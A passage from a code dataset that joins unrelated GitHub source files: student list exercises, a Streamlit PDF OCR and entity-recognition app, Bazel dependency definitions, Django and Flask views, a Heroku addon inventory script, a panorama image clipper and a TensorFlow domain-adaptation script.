\r\n #Loop through the indicies, replacing any negative numbers with zeros\r\n while i < len(values):\r\n #body\r\n if values[i] < 0:\r\n values[i] = 0\r\n \r\n #update\r\n i = i + 1\r\n \r\n return\r\n\r\n\r\n##Shifts all the elements one position to the right. Moves the last element to the first position.\r\ndef shiftRight(values):\r\n #setup\r\n i = (len(values) - 1)\r\n if len(values) > 1:\r\n lastValueHolder = values[-1] #Holds on to the last value so we can replace the first later\r\n \r\n while i >= 0:\r\n #Body\r\n if i > 0: #If I is still looping through\r\n values[i] = values[i-1]\r\n else: #If I has reached the end\r\n values[0] = lastValueHolder #Replace the first index with the last we saved earlier\r\n \r\n #update\r\n i = i - 1\r\n\r\n #return\r\n return\r\n","repo_name":"WillSchick/CS111-Coursework","sub_path":"lab9/listThings.py","file_name":"listThings.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71604201387","text":"import spacy\r\nimport os\r\nimport spacy\r\nfrom spacy.tokens import DocBin\r\nfrom pdf2image import convert_from_path\r\nimport pytesseract\r\nimport random\r\nimport streamlit as st \r\n\r\n# Load the spaCy model\r\nnlp = spacy.load(\"model-best\")\r\n\r\n# Function to convert PDF to images and save them in a folder\r\ndef pdf_to_images(pdf_file_path, output_folder):\r\n images = convert_from_path(pdf_file_path)\r\n\r\n for i, image in enumerate(images):\r\n image_path = os.path.join(output_folder, f\"page_{i + 1}.jpg\")\r\n image.save(image_path, \"JPEG\")\r\n\r\n return images\r\n\r\n\r\ndef extract_named_entities(text):\r\n \r\n\r\n doc = nlp(text)\r\n \r\n entities = []\r\n for ent in doc.ents:\r\n # Get the confidence score from the Span object\r\n \r\n entities.append((ent.text, ent.label_.upper()))\r\n return entities\r\n\r\n\r\ndef extract_text_from_image(img):\r\n \r\n return pytesseract.image_to_string(img)\r\n \r\n\r\ndef save_uploaded_file(uploaded_file):\r\n # Create a temporary directory to save the uploaded file\r\n temp_dir = \"temp1\" # Replace with your desired temporary directory name\r\n if not os.path.exists(temp_dir):\r\n os.makedirs(temp_dir)\r\n\r\n # Save the uploaded file to the temporary directory\r\n file_path = os.path.join(temp_dir, uploaded_file.name)\r\n with open(file_path, \"wb\") as f:\r\n f.write(uploaded_file.getvalue())\r\n\r\n return file_path\r\n\r\ndef main():\r\n \r\n \r\n\r\n\r\n st.title(\"PDF Named Entity Recognition with spaCy\")\r\n\r\n uploaded_file = st.file_uploader(\"Upload a PDF file\", type=[\"pdf\"])\r\n\r\n \r\n if uploaded_file:\r\n # Save the uploaded PDF file and get the path of the saved file\r\n saved_file_path = save_uploaded_file(uploaded_file)\r\n # Save the uploaded file to a temporary folder\r\n \r\n temp_dir = os.path.abspath(\"temp\")\r\n if not os.path.exists(temp_dir):\r\n os.makedirs(temp_dir)\r\n\r\n # Save the uploaded file to the \"temp\" directory\r\n with open(os.path.join(temp_dir, uploaded_file.name), \"wb\") as f:\r\n f.write(uploaded_file.getvalue())\r\n\r\n # Get the file path of the uploaded PDF\r\n pdf_file_path = os.path.join(temp_dir, uploaded_file.name)\r\n\r\n output_folder = os.path.join(temp_dir, \"images\")\r\n if not os.path.exists(output_folder):\r\n os.makedirs(output_folder)\r\n\r\n images = pdf_to_images(os.path.join(\"temp\", uploaded_file.name), output_folder)\r\n if not os.path.exists(\"output\"):\r\n os.makedirs(\"output\")\r\n \r\n\r\n images = pdf_to_images(saved_file_path, \"output\")\r\n\r\n for i, image in enumerate(images):\r\n st.subheader(f\"Processing Page {i + 1}\")\r\n # Perform OCR on the image to extract text\r\n text= extract_text_from_image(image)\r\n \r\n # Perform NER on the extracted text to identify named entities\r\n # entities = extract_named_entities(text)\r\n \r\n # # Display named entities using spaCy displacy.render\r\n # html = spacy.displacy.render(entities, style=\"ent\", page=True, minify=True)\r\n # st.write(html, unsafe_allow_html=True)\r\n entities = extract_named_entities(text)\r\n\r\n # Display named entities using spaCy displacy.render\r\n html = spacy.displacy.render(nlp(text), style=\"ent\", page=True, minify=True)\r\n st.write(html, unsafe_allow_html=True)\r\n\r\n # Display the named entities list with confidence scores\r\n st.subheader(\"Named Entities with Confidence Scores:\")\r\n for entity_text, entity_label in entities:\r\n st.write(f\"{entity_text}: {entity_label} \")\r\n \r\n\r\n# Run the app\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"Laxmikurapati/Named-Entity-Recognition-for-Aadhaar-Card-PDFs","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"134277708","text":"HERAKLES_CPP_COPTS = [\n \"-Wall\",\n \"-Wextra\",\n \"-Werror\",\n \"-pedantic\",\n \"-std=c++1z\",\n]\n\n# Use this in all C cc_library and cc_binary rules that are part of or depend\n# on Herakles.\nHERAKLES_C_COPTS = [\n \"-Wall\",\n \"-Wextra\",\n \"-Werror\",\n \"-pedantic\",\n \"-std=c11\",\n]\n\ndef herakles_repositories(omit_com_github_renatoutsch_rules_flatbuffers=False,\n omit_com_github_renatoutsch_rules_system=False,\n omit_com_github_renatoutsch_rules_spirv=False,\n omit_com_github_gflags_gflags=False,\n omit_com_github_gtruc_glm=False,\n omit_com_github_khronosgroup_vulkan_docs=False,\n omit_com_github_khronosgroup_vulkan_hpp=False,\n omit_com_github_nothings_stb=False,\n omit_com_google_glog=False,\n omit_com_google_googletest=False):\n \"\"\"Imports dependencies for Herakles.\"\"\"\n if not omit_com_github_renatoutsch_rules_flatbuffers:\n com_github_renatoutsch_rules_flatbuffers()\n if not omit_com_github_renatoutsch_rules_system:\n com_github_renatoutsch_rules_system()\n if not omit_com_github_renatoutsch_rules_spirv:\n com_github_renatoutsch_rules_spirv()\n if not omit_com_github_gflags_gflags:\n com_github_gflags_gflags()\n if not omit_com_github_gtruc_glm:\n com_github_gtruc_glm()\n if not omit_com_github_khronosgroup_vulkan_docs:\n com_github_khronosgroup_vulkan_docs()\n if not omit_com_github_khronosgroup_vulkan_hpp:\n com_github_khronosgroup_vulkan_hpp()\n if not omit_com_google_glog:\n com_google_glog()\n if not omit_com_google_googletest:\n com_google_googletest()\n if not omit_com_github_nothings_stb:\n com_github_nothings_stb()\n\ndef com_github_renatoutsch_rules_flatbuffers():\n # TODO(renatoutsch): use a tag or commit once there's a release\n native.http_archive(\n name = \"com_github_renatoutsch_rules_flatbuffers\",\n #sha256 = \"\", # TODO(renatoutsch): add once there's a release\n strip_prefix = \"rules_flatbuffers-master\",\n urls = [\"https://github.com/RenatoUtsch/rules_flatbuffers/archive/master.zip\"],\n )\n\ndef com_github_renatoutsch_rules_system():\n # TODO(renatoutsch): use a tag or commit once there's a release\n native.http_archive(\n name = \"com_github_renatoutsch_rules_system\",\n #sha256 = \"\", # TODO(renatoutsch): add once there's a release\n strip_prefix = \"rules_system-master\",\n urls = [\"https://github.com/RenatoUtsch/rules_system/archive/master.zip\"],\n )\n\ndef com_github_renatoutsch_rules_spirv():\n # TODO(renatoutsch): use a tag or commit once there's a release\n native.http_archive(\n name = \"com_github_renatoutsch_rules_spirv\",\n #sha256 = \"\", # TODO(renatoutsch): add once there's a release\n strip_prefix = \"rules_spirv-master\",\n urls = [\"https://github.com/RenatoUtsch/rules_spirv/archive/master.zip\"],\n )\n\ndef com_github_gflags_gflags():\n native.http_archive(\n name = \"com_github_gflags_gflags\",\n sha256 = \"4e44b69e709c826734dbbbd5208f61888a2faf63f239d73d8ba0011b2dccc97a\",\n strip_prefix = \"gflags-2.2.1\",\n urls = [\"https://github.com/gflags/gflags/archive/v2.2.1.zip\"],\n )\n\ndef com_github_gtruc_glm():\n native.new_http_archive(\n name = \"com_github_gtruc_glm\",\n build_file = \"third_party/glm.BUILD\",\n sha256 = \"0b4c56d74618235ffe8d92f44ec7daef9506923c51762546df7ea4fc8e21face\",\n strip_prefix = \"glm-0.9.8.5\",\n urls = [\"https://github.com/g-truc/glm/archive/0.9.8.5.zip\"],\n )\n\ndef com_github_khronosgroup_vulkan_docs():\n native.new_http_archive(\n name = \"com_github_khronosgroup_vulkan_docs\",\n build_file = \"third_party/vulkan_docs.BUILD\",\n sha256 = \"9d0376c5df89e8a5ac7f945754f6135f9c779bdb38a1d99b416f2a2943e2c118\",\n strip_prefix = \"Vulkan-Docs-1.0.57-core\",\n urls = [\"https://github.com/KhronosGroup/Vulkan-Docs/archive/v1.0.57-core.zip\"],\n )\n\ndef com_github_khronosgroup_vulkan_hpp():\n native.new_http_archive(\n name = \"com_github_khronosgroup_vulkan_hpp\",\n build_file = \"third_party/vulkan_hpp.BUILD\",\n sha256 = \"719503f0dc4ea8b091aeb8aaaf487965d5dc8adea75c673861fd4d988b326391\",\n strip_prefix = \"Vulkan-Hpp-bca6564dac806ea8d30bad792066a3ba963fdbf1\",\n urls = [\"https://github.com/KhronosGroup/Vulkan-Hpp/archive/bca6564dac806ea8d30bad792066a3ba963fdbf1.zip\"],\n )\n\ndef com_github_nothings_stb():\n native.new_http_archive(\n name = \"com_github_nothings_stb\",\n build_file = \"third_party/stb/stb.BUILD\",\n sha256 = \"33e55ecfea2a78516a4fe42b92580ed45caceda26bdee3ac6c933c677c0965fa\",\n strip_prefix = \"stb-9d9f75eb682dd98b34de08bb5c489c6c561c9fa6\",\n urls = [\"https://github.com/nothings/stb/archive/9d9f75eb682dd98b34de08bb5c489c6c561c9fa6.zip\"],\n )\n\ndef com_google_glog():\n native.new_http_archive(\n name = \"com_google_glog\",\n build_file = \"third_party/glog.BUILD\",\n sha256 = \"267103f8a1e9578978aa1dc256001e6529ef593e5aea38193d31c2872ee025e8\",\n strip_prefix = \"glog-0.3.5\",\n urls = [\"https://github.com/google/glog/archive/v0.3.5.zip\"],\n )\n\ndef com_google_googletest():\n native.new_http_archive(\n name = \"com_google_googletest\",\n build_file = \"third_party/googletest.BUILD\",\n sha256 = \"f3ed3b58511efd272eb074a3a6d6fb79d7c2e6a0e374323d1e6bcbcc1ef141bf\",\n strip_prefix = \"googletest-release-1.8.0\",\n urls = [\"https://github.com/google/googletest/archive/release-1.8.0.zip\"],\n )\n","repo_name":"RenatoUtsch/herakles","sub_path":"herakles/defs.bzl","file_name":"defs.bzl","file_ext":"bzl","file_size_in_byte":5721,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34768667770","text":"from django.shortcuts import render\nfrom . models import Document, Rating\nfrom django.db.models import F\n\n\n# Create your views here.\ndef ratesummary(request):\n if request.method == 'POST':\n aid = request.POST['aid']\n com = float(request.POST['com_score'])\n wr = float(request.POST['wr_score'])\n tr = float(request.POST['tr_score'])\n\n # update database and increment count\n status = Rating.objects.create(aid=aid, com_score=com, wr_score=wr, tr_score=tr)\n\n # update avg scores\n article = Document.objects.get(id=aid)\n av_com = float(article.avg_com)\n av_wr = float(article.avg_wr)\n av_tr = float(article.avg_tr)\n count = float(article.num_rating)\n\n av_com = ((av_com*count) + com )/(count+1)\n av_wr = ((av_wr*count) + wr )/(count+1)\n av_tr = ((av_tr*count) + tr )/(count+1)\n\n count = count + 1\n\n Document.objects.filter(id = aid).update(avg_com=av_com, avg_wr=av_wr, avg_tr=av_tr, num_rating=count)\n\n #counter, created = Document.objects.get_or_create(id = aid)\n #counter.num_rating = F('num_rating') + 1\n #counter.save()\n\n return render(request, 'ratesummary/ratesummary.html', {'info': 'thanks'})\n else:\n # get a non rated article\n articles = Document.objects.order_by('?')\n\n if not articles:\n return render(request, 'ratesummary/ratesummary.html', {'info': 'none'})\n else:\n article = articles.first()\n return render(request, 'ratesummary/ratesummary.html', {'article': article, 'info': 'fresh'})\n","repo_name":"kaykobad/ses","sub_path":"ratesummary/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16786461684","text":"from flask import Flask, render_template, request # request modul notwendig, um URL Parameter zu übergeben\napp = Flask(__name__)\n\n# Klasse\nclass Location():\n def __init__(self, location, duration):\n self.location = location\n self.duration = duration # * 2 Hier könnte man Berechnungen machen\n\n\n@app.route(\"/\")\ndef start():\n title = \"Nice locations to visit\"\n greeting = \"Find your location of love!\"\n\n# Klasse\n places = [\n Location(\"Paris\", 2),\n Location(\"Stade\", 5),\n Location(\"Hamburg\", 1),\n Location(\"Praque\", 3)\n ]\n\n# Oder Dictionaries ohne Klasse\n# places = [\n# {\"location\": \"Paris\", \"duration\": 4},\n# {\"location\": \"Stade\", \"duration\": 10},\n# {\"location\": \"Hamburg\", \"duration\": 2},\n# {\"location\": \"Praque\", \"duration\": 6},\n# ]\n\n# Hier könnte man Berechnungen zu Dictionaries machen\n# for location in places:\n# location[\"duration\"] = location[\"duration\"] # * 2 Oder hier Berechnungen machen\n\n# Oder Tupel ohne Klasse\n# places = [\n# (\"Paris\", 8),\n# (\"Stade\", 20),\n# (\"Hamburg\", 4),\n# (\"Parque\", 12)\n# ]\n\n\n return render_template(\"start.html\",\n paragraph=greeting,\n location={\"location\": \"Barcelona\", \"duration\": 14},\n locations=places,\n title=title)\n\n\n@app.route(\"/locations\")\ndef locations():\n parameters = request.args\n location = parameters.get(\"location\")\n daytime = parameters.get(\"daytime\")\n days = parameters.get(\"days\")\n\n return render_template(\"locations.html\", location=location, daytime=daytime, days=days)\n","repo_name":"ViktorXs/learning-python","sub_path":"hauptuebungen/11_flask/09_eigene_klassen_und_dictionaries_weiterleiten/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74505951466","text":"# https://www.codewars.com/kata/5254ca2719453dcc0b00027d\n# 2023-03-11T12:12:22.763+0000\ndef permutations(s):\n if len(s) == 1:\n return [s]\n output_set = set()\n for i, letter in enumerate(s):\n for perm in permutations(s[:i] + s[i+1:]):\n output_set.add(letter + perm)\n return list(output_set)","repo_name":"Eatkin/codewars-solutions","sub_path":"Python/So_Many_Permutations-4_kyu.py","file_name":"So_Many_Permutations-4_kyu.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"811969315","text":"# Factorial of a number is the product of all the integers from 1 to that number.\n# 6! = 6*5*4*3*2*1 =720 (positve number)\n# Factorial is not defined for negative numbers\n# Factorial of zero is one ( 0! = 1 )\n\n# Python program to find the factorial of a number provided by the user.\n\nnum = int(input(\"Enter a number: \"))\n\nfactorial = 1\n\n# check if the number is negative, positive or zero\nif num < 0:\n print(\"Sorry, factorial does not exist for negative numbers\")\nelif num == 0:\n print(\"The factorial of 0 is 1\")\nelse:\n for i in range(1, num + 1):\n factorial = factorial * i\n print(f\"The factorial of {num} is {factorial}\")\n","repo_name":"Nikhil235/Python","sub_path":"Intoduction/Numbers/factorial.py","file_name":"factorial.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28952382111","text":"import os\nimport numpy as np\nimport cv2\nimport threading\nimport math\n\nFACES = ['nz', 'pz', 'px', 'nx', 'ny', 'py']\n\ndef sphere_to_cube(file_path, resolution=2048, format=\"hdr\", output=\"output\"):\n # im = cv2.imread(file_path)\n im = cv2.imdecode(np.fromfile(file_path, dtype=np.uint8), -1)\n hsize = resolution / 2\n pos_array = np.arange(0, resolution * resolution, 1)\n axA_array = np.floor_divide(pos_array, resolution)\n axB_array = np.fmod(pos_array, resolution)\n output_cubes = []\n tasks = []\n for i in range(0, 5):\n # output_cube = os.path.join(output, \"%s%s.%s\" % (\"sp_\", FACES[i], \"png\"))\n # output_cubes.append(output_cube)\n filename_with_extension = os.path.basename(file_path)\n filename_without_extension = os.path.splitext(filename_with_extension)[0]\n output_cube = os.path.join(output, filename_without_extension)\n task = threading.Thread(target=sphere_to_cube_process,\n args=(im, i, axA_array, axB_array, resolution, hsize, format, output_cube),\n name=\"sphere_to_cube_\" + str(i))\n task.start() # 启动进程\n tasks.append(task)\n for task in tasks:\n task.join()\n return output_cubes\n\ndef sphere_to_cube_process(im, face_id, axA_array, axB_array, size, hsize, format, output_cube):\n # nz\n if FACES[face_id] == 'nz':\n x_array = np.full(size * size, hsize)\n y_array = - axB_array + np.full(size * size, hsize)\n z_array = - axA_array + np.full(size * size, hsize)\n # pz\n elif FACES[face_id] == 'pz':\n x_array = np.full(size * size, -hsize)\n y_array = axB_array + np.full(size * size, -hsize)\n z_array = - axA_array + np.full(size * size, hsize)\n # px\n elif FACES[face_id] == 'px':\n x_array = axB_array + np.full(size * size, -hsize)\n y_array = np.full(size * size, hsize)\n z_array = - axA_array + np.full(size * size, hsize)\n # nx\n elif FACES[face_id] == 'nx':\n x_array = - axB_array + np.full(size * size, hsize)\n y_array = np.full(size * size, -hsize)\n z_array = - axA_array + np.full(size * size, hsize)\n # ny 下\n elif FACES[face_id] == 'ny':\n x_array = axB_array + np.full(size * size, -hsize)\n y_array = -axA_array + np.full(size * size, hsize)\n z_array = np.full(size * size, -hsize)\n\n r_array = np.sqrt(x_array * x_array + y_array * y_array + z_array * z_array)\n theta_array = np.arccos(z_array / r_array)\n phi_array = -np.arctan2(y_array, x_array)\n ix_array = np.floor_divide((im.shape[1] - 1) * phi_array, (2 * math.pi))\n iy_array = np.floor_divide((im.shape[0] - 1) * (theta_array), math.pi)\n ix_array = np.where(ix_array >= 0, ix_array, im.shape[1] + ix_array)\n iy_array = np.where(iy_array >= 0, iy_array, im.shape[0] + iy_array)\n index_array = iy_array * im.shape[1] + ix_array\n reshape_array = im.reshape((im.shape[0] * im.shape[1], 3))\n color_side = reshape_array[index_array.astype(int)]\n color_side = color_side.reshape((size, size, 3))\n clip_image(FACES[face_id], color_side, output_cube)\n\ndef clip_image(face, img, output_file):\n \"\"\"\n 下视角按2048*2048切割后再缩放成1024*1024;\n 其他视角先从3072以下截图,再裁剪成1024*1024;\n \"\"\"\n if face == 'ny':\n img = np.rot90(img, 1)\n width, height, _ = img.shape\n size = 2048\n re_size = 1024\n # 计算覆盖输入文件所需的瓦片数\n num_tiles_x = width // size\n num_tiles_y = height // size\n for x in range(num_tiles_x):\n for y in range(num_tiles_y):\n # 计算瓦片的坐标\n x_min = x * size\n y_min = y * size\n x_max = x_min + size\n y_max = y_min + size\n # 使用cv裁剪瓦片\n save_file = f'{output_file}_{face}_{x_min}_{y_min}.png'\n # save_file = os.path.join(output_file, \"_%s_%s_%s%s\" % (face, x_min, y_min, \".png\"))\n color_side = cv2.resize(img[x_min:x_max, y_min:y_max],(re_size,re_size))\n if (veg_extract(color_side) and Is_approximately_pure_color_image(color_side)):\n # cv2.imwrite(save_file, color_side)\n cv2.imencode('.jpg', color_side)[1].tofile(save_file)\n\n #其他视角\n else:\n img = img[3072:, :]\n width, height, _ = img.shape\n size = 1024\n # 计算覆盖输入文件所需的瓦片数\n num_tiles_x = width // size\n num_tiles_y = height // size\n for x in range(num_tiles_x):\n for y in range(num_tiles_y):\n # 计算瓦片的坐标\n x_min = x * size\n y_min = y * size\n x_max = x_min + size\n y_max = y_min + size\n # 使用cv裁剪瓦片\n save_file = f'{output_file}_{face}_{x_min}_{y_min}.png'\n # save_file = os.path.join(output_file, \"_%s_%s_%s%s\" % (face, x_min, y_min, \".png\"))\n color_side = cv2.resize(img[x_min:x_max, y_min:y_max],(size,size), interpolation=cv2.INTER_AREA)\n if (veg_extract(color_side) and Is_approximately_pure_color_image(color_side)):\n # cv2.imwrite(save_file, color_side)\n cv2.imencode('.jpg', color_side)[1].tofile(save_file) #中文路径\n\ndef pitch_process_clip(input_folder_path, output_folder_path):\n file_list = os.listdir(input_folder_path)\n # 输出所有文件\n for file_name in file_list:\n file_extension = file_name.split('.')[-1]\n if file_extension.lower() == 'jpg':\n file_path = os.path.join(input_folder_path, file_name)\n os.makedirs(output_folder_path, exist_ok=True)\n sphere_to_cube(file_path, resolution=4096, format=\"JPG\", output=output_folder_path)\n\ndef veg_extract(img):\n B, G, R = cv2.split(img)\n # 计算植被指数\n # cive = 0.441 * R - 0.811 * G + 0.385 * B + 18.78745\n cive = 2.4 * G - B - R\n gray = cive.astype('uint8')\n # Apply thresholding to the image\n ret, thresh = cv2.threshold(gray, 0, 1, cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n # Calculate the percentage of white pixels in the image\n white_pixels = np.sum(thresh == 1)\n total_pixels = img.shape[0] * img.shape[1]\n percentage_white = (white_pixels / total_pixels) * 100\n if percentage_white > 30:\n return True\n else:\n return False\n\ndef Is_approximately_pure_color_image(image, threshold=20):\n # 将彩色图像转换为灰度图像\n gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n mean_value = np.mean(gray_image)\n # 计算每个像素与平均像素值之间的差异\n pixel_diff = np.abs(gray_image - mean_value)\n # 计算差异的标准差或平均绝对差\n diff_std = np.std(pixel_diff)\n # 判断图像是否为近似纯颜色图像\n if diff_std >= threshold:\n return True\n else:\n return False\n\n\nif __name__ == '__main__':\n file_path = r'E:\\project\\高明区全景识别\\data\\1008高明查违\\第四期\\100MEDIA'\n out_dir = r'E:\\project\\高明区全景识别\\data\\img_1024_4'\n\n pitch_process_clip(file_path, out_dir)\n","repo_name":"loki-keroro/CropUnet","sub_path":"utils/sphere_clip_wp.py","file_name":"sphere_clip_wp.py","file_ext":"py","file_size_in_byte":7269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36027778820","text":"#!/usr/bin/env python3\n\nimport csv\nimport fileinput\nimport re\nimport subprocess\nimport sys\n\n\noutfile = csv.writer(sys.stdout)\n\nheaders = [\"app\", \"addon\", \"plan\", \"price\"] \noutfile.writerow(headers)\n\nfor app in fileinput.input():\n app = app.strip()\n sys.stderr.write(\"Querying for (%s)\\n\" % (app,))\n completed = subprocess.run(['heroku', 'addons', '-a', app], stdout=subprocess.PIPE)\n output_lines = completed.stdout.decode(\"utf-8\").split('\\n')\n for addon in output_lines:\n if \"created\" not in addon:\n continue\n # fields = [addon, plan, price, status]\n fields = [f.strip() for f in re.split(r\" +\", addon)]\n # process price\n if fields[2] == \"free\":\n fields[2] = 0\n elif \"billed to\" in fields[2]:\n continue\n else:\n price_match = re.match(r\"\\$(\\d+)/month\", fields[2])\n fields[2] = int(price_match.groups()[0])\n # strip addon ID\n fields[0] = fields[0].split(\" \")[0]\n outfile.writerow([app] + fields[:3])\n","repo_name":"erjiang/heroku_inventory","sub_path":"heroku_inventory.py","file_name":"heroku_inventory.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24770128756","text":"from sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import train_test_split\nimport pyarrow.parquet as pq\nimport pandas as pd\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.metrics import r2_score\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras.layers import Input, Dense, Lambda, Dropout\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.losses import mean_squared_error, binary_crossentropy\nfrom tensorflow.keras.optimizers import Adam\n\nnp.random.seed(42)\ntf.random.set_seed(42)\n\n# Load and preprocess the dataset\ncell_df = pq.read_table(source='cellular_dataframe.parquet').to_pandas()\nfiltered_data = cell_df.query(\"direction == 'downlink' & measured_qos == 'datarate'\")\nfiltered_data = filtered_data.dropna(subset = 'datarate')\n\ntrain_data = filtered_data.query(\"operator == 1\")\ntest_data = filtered_data.query(\"operator == 2\")\n\n# Select the chosen features\nqos_column = 'datarate'\n\n\nselected_features = [\n \n 'PCell_RSRP_max',\n 'PCell_RSRQ_max',\n 'PCell_RSSI_max',\n 'PCell_SNR_1',\n 'PCell_SNR_2',\n 'PCell_Downlink_Num_RBs',\n 'PCell_Downlink_TB_Size',\n 'PCell_Downlink_Average_MCS',\n 'SCell_RSRP_max',\n 'SCell_RSRQ_max',\n 'SCell_RSSI_max',\n 'SCell_SNR_1',\n 'SCell_SNR_2',\n 'SCell_Downlink_Num_RBs',\n 'SCell_Downlink_TB_Size',\n 'SCell_Downlink_Average_MCS',\n 'Traffic Jam Factor'\n]\n\nx_train_source, y_train_source = train_data[selected_features], train_data[qos_column]\nx_test_target, y_test_target = test_data[selected_features], test_data[qos_column]\n\n\nimputer = SimpleImputer(strategy='mean')\nx_train_source = imputer.fit_transform(x_train_source)\nx_test_target = imputer.transform(x_test_target)\n\nsource_domain_labels = np.zeros(x_train_source.shape[0])\ntarget_domain_labels = np.ones(x_test_target.shape[0])\ndomain_labels = np.concatenate((source_domain_labels, target_domain_labels))\n\ncombined_data = np.concatenate((x_train_source, x_test_target))\n\ninput_layer = Input(shape=(x_train_source.shape[1],))\n\nfeature_extractor_hidden = Dense(100, activation='relu')(input_layer)\nshared_features = Dense(100, activation='relu')(feature_extractor_hidden)\nregression_hidden = Dense(100, activation='relu')(shared_features)\nregression_output = Dense(1)(regression_hidden)\ndomain_hidden = Dense(100, activation='relu')(shared_features)\ndomain_output = Dense(1, activation='sigmoid')(domain_hidden)\n\nregression_model = Model(inputs=input_layer, outputs=regression_output)\ncombined_model = Model(inputs=input_layer, outputs=[regression_output, domain_output])\n\n# Create gradient reversal layer\ndef grad_reverse(x):\n return -1.0 * x\n\ngradient_reversal_layer = Lambda(grad_reverse)\n\ndomain_adversarial_output = gradient_reversal_layer(domain_output)\n\ncombined_model.compile(\n optimizer=Adam(learning_rate=0.05),\n loss=['mean_squared_error', 'binary_crossentropy'],\n loss_weights=[1.0, 1.0]\n)\n\nx_train_source_mean = x_train_source.mean()\nx_train_source_std = x_train_source.std()\nx_train_source_normalized = (x_train_source - x_train_source_mean) / x_train_source_std\nx_test_target_normalized = (x_test_target - x_train_source_mean) / x_train_source_std\ny_train_source_mean = y_train_source.mean()\ny_train_source_std = y_train_source.std()\ny_train_source_normalized = (y_train_source - y_train_source_mean) / y_train_source_std\n\ncombined_model.fit(\n x_train_source_normalized,\n [y_train_source_normalized, source_domain_labels],\n epochs=64,\n batch_size=32\n)\n\ny_pred_target_normalized, _ = combined_model.predict(x_test_target_normalized)\n\ny_pred_target = (y_pred_target_normalized * y_train_source_std) + y_train_source_mean\n\nr2_target = r2_score(y_test_target, y_pred_target)\n\nprint(\"R2 Score on Target Domain:\", r2_target)\n\n\n# input_layer = Input(shape=(x_train_source.shape[1],))\n\n# feature_extractor_hidden = Dense(100, activation='relu')(input_layer)\n# shared_features = Dense(100, activation='relu')(feature_extractor_hidden)\n# regression_hidden = Dense(100, activation='relu')(shared_features)\n# regression_output = Dense(1)(regression_hidden)\n# domain_hidden = Dense(100, activation='relu')(shared_features)\n# domain_output = Dense(1, activation='sigmoid')(domain_hidden)\n\n# regression_model = Model(inputs=input_layer, outputs=regression_output)\n# combined_model = Model(inputs=input_layer, outputs=[regression_output, domain_output])\n\n# def grad_reverse(x):\n# return -1.0 * x\n\n# gradient_reversal_layer = Lambda(grad_reverse)\n# reversed_domain_output = gradient_reversal_layer(domain_hidden)\n# domain_adversarial_output = Dense(1, activation='sigmoid')(reversed_domain_output)\n\n# domain_adversarial_model = Model(inputs=input_layer, outputs=domain_adversarial_output)\n\n# combined_model.compile(\n# optimizer=Adam(learning_rate=0.05),\n# loss=['mean_squared_error', 'binary_crossentropy'],\n# loss_weights=[1.0, 1.0]\n# )\n\n# domain_adversarial_model.compile(\n# optimizer=Adam(learning_rate=0.05),\n# loss='binary_crossentropy'\n# )\n\n# x_train_source_mean = x_train_source.mean()\n# x_train_source_std = x_train_source.std()\n# y_train_source_mean = y_train_source.mean()\n# y_train_source_std = y_train_source.std()\n# x_train_source_normalized = (x_train_source - x_train_source_mean) / x_train_source_std\n# x_test_target_normalized = (x_test_target - x_train_source_mean) / x_train_source_std\n# y_train_source_normalized = (y_train_source - y_train_source_mean) / y_train_source_std\n\n# combined_model.fit(\n# x_train_source_normalized,\n# [y_train_source_normalized, source_domain_labels],\n# epochs=64,\n# batch_size=32\n# )\n\n# domain_adversarial_model.fit(\n# combined_data,\n# domain_labels,\n# epochs=64,\n# batch_size=32\n# )\n\n# y_pred_target_normalized, _ = combined_model.predict(x_test_target_normalized)\n\n# y_pred_target = (y_pred_target_normalized * y_train_source_std) + y_train_source_mean\n\n# r2_target = r2_score(y_test_target, y_pred_target)\n\n# print(\"R2 Score on Target Domain:\", r2_target)\n","repo_name":"z1433223/ITU_AI_PS003","sub_path":"lte_challenge.py","file_name":"lte_challenge.py","file_ext":"py","file_size_in_byte":6009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38657501235","text":"\"\"\"\nz populacji generalnej n = 50 pobrano elementarną próbkę i przebadano ze względu na cechę X. Otrzymano wyniki:\n3.6, 5.0, 4.0, 4.7, 5.2, 5.9, 4.5, 5.3, 5.5, 3.9, 5.6, 3.5, 5.4, 5.2, 4.1, 5.0, 3.1, 5.8, 4.8, 4.4, 4.6, 5.1, 4.7, 3.0, 5.5, 6.1, 3.8, 4.9, 5.6, 6.1, 5.9, 4.2, 6.4, 5.3, 4.5, 4.9, 4.0, 5.2, 3.3, 5.4, 4.7, 6.4, 5.1, 3.4, 5.2, 6.2, 4.4, 4.3, 5.8, 3.7\n\nzbadaj:\n- ilosc klas\n- szerokosc pojedynczej klasy\n- ilosc elementow w klasie\n\nstworz histogram\n\"\"\"\n\nfrom math import floor\nfrom math import sqrt\nimport csv\n\n# spis wszystkich zbadanych wartosci\nresults = [3.6, 5.0, 4.0, 4.7, 5.2, 5.9, 4.5, 5.3, 5.5, 3.9, 5.6, 3.5, 5.4, 5.2, 4.1, 5.0, 